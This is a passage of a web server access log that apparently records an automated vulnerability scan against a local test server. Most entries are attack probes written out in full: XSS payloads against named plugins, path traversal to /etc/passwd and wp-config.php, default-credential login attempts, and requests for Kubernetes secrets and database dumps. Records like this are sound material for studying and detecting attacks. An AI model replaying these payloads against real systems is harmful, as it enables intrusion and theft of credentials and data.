6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"new_login_session_management=1&languageChoice=1&authUser=admin&clearPass=pass&languageChoice=10","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29K6BY4UBCPIcbnL4iPfw2gBDsi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client_secrets.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sfwd-lms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lan.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iPages/i_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"username=admin&password=geoserver","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /geoserver/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn __schema {\x5Cn directive\x5Cn }\x5Cn}\x22,\x22variables\x22:null}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/config/1.0/directory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"--871a4a346a547cf05cb83f57b9ebcb83\x0D\x0AContent-Disposition: form-data; name=\x22files\x22; filename=\x22test.tar\x22\x0D\x0A\x0D\x0A../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 0000000000000029K6BduWV9HuFPwAQn1XFJoaIAw\x0D\x0A--871a4a346a547cf05cb83f57b9ebcb83--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/UploadServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/snp/snoop.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/rest/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOE+/session_password.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=mlw_quiz_list&s=\x22>&paged=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/index.php?db=information_schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/logoff.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"name=ADMIN&pwd=ADMIN","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin.php?page=vfb-export HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/wp-admin/admin.php?page=vfb-export", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/maint/repair.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/weblogic.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1_db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\x22;user|s.\x221337\x22; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 